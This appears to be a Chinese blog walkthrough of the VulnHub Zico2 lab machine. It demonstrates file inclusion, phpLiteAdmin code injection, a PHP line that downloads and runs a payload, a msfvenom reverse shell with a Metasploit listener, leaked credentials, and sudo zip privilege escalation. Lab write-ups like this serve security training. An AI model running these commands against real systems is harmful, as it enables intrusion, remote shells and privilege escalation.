ICode9

精准搜索请尝试: 精确搜索
首页 > 其他分享> 文章详细

靶机渗透实战(1)–zico2渗透实战

2021-10-16 14:59:55  阅读:184  来源: 互联网

标签:实战 渗透 192.168 zico2 密码 木马 IP地址 msf 目录


靶机下载地址为:https://download.vulnhub.com/zico/zico2.ova

Kali攻击机IP地址:192.168.49.235

Zico2靶机IP:192.168.49.30

目录

信息收集

首先查看自己IP地址如下图,IP地址是192.168.49.235
在这里插入图片描述

使用netdiscover命令来查看本地存活的IP地址

netdiscover -i eth0 -r 192.168.49.0/24

靶机的IP地址是:192.168.49.30
在这里插入图片描述

端口扫描

使用masscan来扫描端口

但是我不知道为什么我这扫不出来
在这里插入图片描述
使用nmap来扫描开放的端口,nmap有些时候扫不全

开放的端口有22,80,111
在这里插入图片描述

80为http端口我们直接用IP地址访问,然后乱点一通,发现没啥东西

然后在一个URL上面发现了类似于"?page="的东西,可能有文件包含

如下红圈
在这里插入图片描述
读取一下/etc/passwd,发现读取不出来,可能是不在这个目录,输入一堆"…/"

发现能成功读取出来证明有文件读取漏洞
在这里插入图片描述

目录扫描

使用命令dirb IP地址或者域名来扫描

dirb http://192.168.49.30

发现出来一堆
在这里插入图片描述
http://192.168.49.30/css
在这里插入图片描述
访问dbname的时候发现是个数据库后台地址

在这里插入图片描述

渗透测试

发现CMS是phpLiteAdmin

我们使用命令searchsploit命令来查找这个CMS是否有啥漏洞

是有远程命令执行漏洞
在这里插入图片描述
刚才发现的dbadmin直接访问里面的php,我们先使用弱密码来登录,比如admin,或者123456之类的密码

发现就进去了???这估计是我进的最快的一次,弱密码是admin

如果出不来,可以用弱密码爆破
在这里插入图片描述
如果进了后台我们先查看自带的数据库里面的内容

如下,发现出现了root密码和zico的密码,密码被md5加密了

我们使用在线网站解密如下
在线解密

解密出来分别是

账户root 密码 34kroot34
账户Zico 密码 zico2215@

在这里插入图片描述
SSH尝试远程登录

发现两个账户登录都全部失败
在这里插入图片描述
只能另寻出路

前面发现了文件包含和php命令执行,下面说思路

第一个方法是中国菜刀,第二个方法是KALI生成一个Linux的shell木马,然后让靶机下载并且运行木马,但是在此之前先要验证一下

先在数据库里面创建一个数据库 > 创建表
在这里插入图片描述
内容是:<?php info();?>

作用是测试是否执行了phpinfo的信息
在这里插入图片描述
查看字段内容
在这里插入图片描述
在这里插入图片描述
就在刚才发现的文件包含那边读取一下

http://192.168.49.30/view.php?page=…/…/…/…/usr/databases/msf

成功能访问出phpinfo()
在这里插入图片描述

中国菜刀

如果能像上面一样执行,那我们就可以写入一句话木马然后用菜刀来连接了

新建一个数据库 > 创建表 >插入数据,操作和上面一样,如下图
在这里插入图片描述
最后我们在访问试试,菜刀连接成功,接下来就可以随意访问了,测试之后,发现root目录进不去其他都可以
在这里插入图片描述
经过测试在home/Zico下发现了可利用的东西

发现了wordpress目录

一般在wordpress里面有个配置文件叫做wp-config.php的文件

这个文件有记录了数据库的信息密码之类的东西
在这里插入图片描述
打开wp-config.php
在这里插入图片描述
发现了账户和密码

账户是:zico 密码是:sWfCsfJSPV9H3AmQzw8

就可以使用这个账户密码去SSH连接试试了

但是我最开始以为这个密码需要解密,结果不需要
在这里插入图片描述
SSH连接成功
在这里插入图片描述
就可以开始提权操作

touch 1.txt
sudo -u root zip 1.zip 1.txt -T --unzip-command="sh -c /bin/bash"

提权成功flag就在root目录下面

木马操作

因为靶机要从我们KALI下载文件,所以我们要在KALI上面开启http服务

开启apach2:service apach2 start

然后进入网站目录

cd /var/www/html

然后在html目录里面生成木马

msfvenom -a x86 --platform linux -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.49.235 LPORT=4444 -f elf -o shell

在这里插入图片描述
和上面一样创建一个数据库和表内容写入的是

<?php system("cd /tmp;wget http://192.168.49.30/muma;chmod 777 muma;./muma");?>

意思就是先进入tmp目录,因为tmp目录有运行存在,然后wget下载KALI的木马,然后chmod 777给muma赋值777的权限,然后./muma,运行木马

最后会在KALI里面返回webshell
在这里插入图片描述
然后在KALI里面打开msf工具

命令如下,然后就开启了监听

msf > use exploit/multi/handler
msf exploit(multi/handler) > set LHOST 192.168.204.155
LHOST => 192.168.204.155
msf exploit(multi/handler) > set LPORT 4444
LPORT => 4444
msf exploit(multi/handler) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 192.168.204.155:4444

这时候我们就可以直接去访问一下刚才在数据库上的木马文件
在这里插入图片描述
然后查看监听状态,发现返回了meterpreter
在这里插入图片描述
输入命令shell,将shell修改为交互式tty

python -c 'import pty;pty.spawn("/bin/bash")'

提权

然后就和上面菜刀操作一样

进入Zico目录下面的 wordpress目录里面的wp-config.php目录查看账户和密码就能登录Zico账户,之后的操作就和菜刀操作一样了

标签:实战,渗透,192.168,zico2,密码,木马,IP地址,msf,目录
来源: https://blog.csdn.net/kengkeng123qwe/article/details/120798176

本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享;
2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关;
3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关;
4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除;
5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。

专注分享技术,共同学习,共同进步。侵权联系[81616952@qq.com]

Copyright (C)ICode9.com, All Rights Reserved.

ICode9版权所有